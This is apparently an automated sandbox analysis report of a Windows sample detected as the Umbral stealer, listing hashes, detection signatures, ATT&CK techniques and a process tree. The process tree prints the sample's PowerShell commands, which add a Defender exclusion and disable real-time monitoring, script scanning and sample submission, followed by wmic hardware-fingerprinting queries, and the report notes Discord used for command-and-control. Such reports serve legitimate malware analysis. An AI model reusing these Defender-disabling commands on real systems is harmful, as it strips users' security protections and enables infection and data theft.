Analysis
-
max time kernel
15s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
13-12-2024 07:01
Behavioral task
behavioral1
Sample
85eadbe66e59f3512bfed3edd076ed4c.exe
Resource
win7-20241010-en
General
-
Target
85eadbe66e59f3512bfed3edd076ed4c.exe
-
Size
231KB
-
MD5
85eadbe66e59f3512bfed3edd076ed4c
-
SHA1
3fac3f7414bd4ced53beb1d89402524a2b9cb510
-
SHA256
921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76
-
SHA512
18ca000aaec36bb3221cd70e042b1dd49ace60ff1469059eb4e27c0af8889d5dc31133827a97a8f146970097b70152e7e65d5286fa0721476c5b8cb06277637e
-
SSDEEP
6144:RloZM3rIkd8g+EtXHkv/iD4iYQ5ClU8e1mmN5i:joZIL+EP8Jo1Ng
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/2256-1-0x0000000001250000-0x0000000001290000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2212 powershell.exe 2976 powershell.exe 1568 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 discord.com 9 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1436 wmic.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2212 powershell.exe 2976 powershell.exe 1568 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2256 85eadbe66e59f3512bfed3edd076ed4c.exe Token: SeDebugPrivilege 2212 powershell.exe Token: SeDebugPrivilege 2976 powershell.exe Token: SeIncreaseQuotaPrivilege 3052 wmic.exe Token: SeSecurityPrivilege 3052 wmic.exe Token: SeTakeOwnershipPrivilege 3052 wmic.exe Token: SeLoadDriverPrivilege 3052 wmic.exe Token: SeSystemProfilePrivilege 3052 wmic.exe Token: SeSystemtimePrivilege 3052 wmic.exe Token: SeProfSingleProcessPrivilege 3052 wmic.exe Token: SeIncBasePriorityPrivilege 3052 wmic.exe Token: SeCreatePagefilePrivilege 3052 wmic.exe Token: SeBackupPrivilege 3052 wmic.exe Token: SeRestorePrivilege 3052 wmic.exe Token: SeShutdownPrivilege 3052 wmic.exe Token: SeDebugPrivilege 3052 wmic.exe Token: SeSystemEnvironmentPrivilege 3052 wmic.exe Token: SeRemoteShutdownPrivilege 3052 wmic.exe Token: SeUndockPrivilege 3052 wmic.exe Token: SeManageVolumePrivilege 3052 wmic.exe Token: 33 3052 wmic.exe Token: 34 3052 wmic.exe Token: 35 3052 wmic.exe Token: SeIncreaseQuotaPrivilege 3052 wmic.exe Token: SeSecurityPrivilege 3052 wmic.exe Token: SeTakeOwnershipPrivilege 3052 wmic.exe Token: SeLoadDriverPrivilege 3052 wmic.exe Token: SeSystemProfilePrivilege 3052 wmic.exe Token: SeSystemtimePrivilege 3052 wmic.exe Token: SeProfSingleProcessPrivilege 3052 wmic.exe Token: SeIncBasePriorityPrivilege 3052 wmic.exe Token: SeCreatePagefilePrivilege 3052 wmic.exe Token: SeBackupPrivilege 3052 wmic.exe Token: SeRestorePrivilege 3052 wmic.exe Token: SeShutdownPrivilege 3052 wmic.exe Token: SeDebugPrivilege 3052 wmic.exe Token: SeSystemEnvironmentPrivilege 3052 wmic.exe Token: SeRemoteShutdownPrivilege 3052 wmic.exe Token: SeUndockPrivilege 3052 wmic.exe Token: SeManageVolumePrivilege 3052 wmic.exe Token: 33 3052 wmic.exe Token: 34 3052 wmic.exe Token: 35 3052 wmic.exe Token: SeIncreaseQuotaPrivilege 2552 wmic.exe Token: SeSecurityPrivilege 2552 wmic.exe Token: SeTakeOwnershipPrivilege 2552 wmic.exe Token: SeLoadDriverPrivilege 2552 wmic.exe Token: SeSystemProfilePrivilege 2552 wmic.exe Token: SeSystemtimePrivilege 2552 wmic.exe Token: SeProfSingleProcessPrivilege 2552 wmic.exe Token: SeIncBasePriorityPrivilege 2552 wmic.exe Token: SeCreatePagefilePrivilege 2552 wmic.exe Token: SeBackupPrivilege 2552 wmic.exe Token: SeRestorePrivilege 2552 wmic.exe Token: SeShutdownPrivilege 2552 wmic.exe Token: SeDebugPrivilege 2552 wmic.exe Token: SeSystemEnvironmentPrivilege 2552 wmic.exe Token: SeRemoteShutdownPrivilege 2552 wmic.exe Token: SeUndockPrivilege 2552 wmic.exe Token: SeManageVolumePrivilege 2552 wmic.exe Token: 33 2552 wmic.exe Token: 34 2552 wmic.exe Token: 35 2552 wmic.exe Token: SeIncreaseQuotaPrivilege 2552 wmic.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 2256 wrote to memory of 2212 2256 85eadbe66e59f3512bfed3edd076ed4c.exe 30 PID 2256 wrote to memory of 2212 2256 85eadbe66e59f3512bfed3edd076ed4c.exe 30 PID 2256 wrote to memory of 2212 2256 85eadbe66e59f3512bfed3edd076ed4c.exe 30 PID 2256 wrote to memory of 2976 2256 85eadbe66e59f3512bfed3edd076ed4c.exe 32 PID 2256 wrote to memory of 2976 2256 85eadbe66e59f3512bfed3edd076ed4c.exe 32 PID 2256 wrote to memory of 2976 2256 85eadbe66e59f3512bfed3edd076ed4c.exe 32 PID 2256 wrote to memory of 3052 2256 85eadbe66e59f3512bfed3edd076ed4c.exe 34 PID 2256 wrote to memory of 3052 2256 85eadbe66e59f3512bfed3edd076ed4c.exe 34 PID 2256 wrote to memory of 3052 2256 85eadbe66e59f3512bfed3edd076ed4c.exe 34 PID 2256 wrote to memory of 2552 2256 85eadbe66e59f3512bfed3edd076ed4c.exe 37 PID 2256 wrote to memory of 2552 2256 85eadbe66e59f3512bfed3edd076ed4c.exe 37 PID 2256 wrote to memory of 2552 2256 85eadbe66e59f3512bfed3edd076ed4c.exe 37 PID 2256 wrote to memory of 1988 2256 85eadbe66e59f3512bfed3edd076ed4c.exe 39 PID 2256 wrote to memory of 1988 2256 85eadbe66e59f3512bfed3edd076ed4c.exe 39 PID 2256 wrote to memory of 1988 2256 85eadbe66e59f3512bfed3edd076ed4c.exe 39 PID 2256 wrote to memory of 1568 2256 85eadbe66e59f3512bfed3edd076ed4c.exe 41 PID 2256 wrote to memory of 1568 2256 85eadbe66e59f3512bfed3edd076ed4c.exe 41 PID 2256 wrote to memory of 1568 2256 85eadbe66e59f3512bfed3edd076ed4c.exe 41 PID 2256 wrote to memory of 1436 2256 85eadbe66e59f3512bfed3edd076ed4c.exe 43 PID 2256 wrote to memory of 1436 2256 85eadbe66e59f3512bfed3edd076ed4c.exe 43 PID 2256 wrote to memory of 1436 2256 85eadbe66e59f3512bfed3edd076ed4c.exe 43
Processes
-
C:\Users\Admin\AppData\Local\Temp\85eadbe66e59f3512bfed3edd076ed4c.exe"C:\Users\Admin\AppData\Local\Temp\85eadbe66e59f3512bfed3edd076ed4c.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\85eadbe66e59f3512bfed3edd076ed4c.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2212
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2976
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3052
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2552
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:1988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1568
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:1436
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD54311d040b6ba937e54db2a9c6eea5a91
SHA13d36cdcbe8c1407e81fdefa114e4beb5ae2aebbc
SHA25696b5a41f0aca45594addd8801a853dfb0e9e7b7493e66de7403ddba9bed7998f
SHA512371df623b4bc9a7d0f1fccda37783b4c6c29bb8548fbe5dea58fc708022802b19edaef18e833ffde56046b67f2cd36ca896b9eb9bfffe0963f420a6a4cae5a6d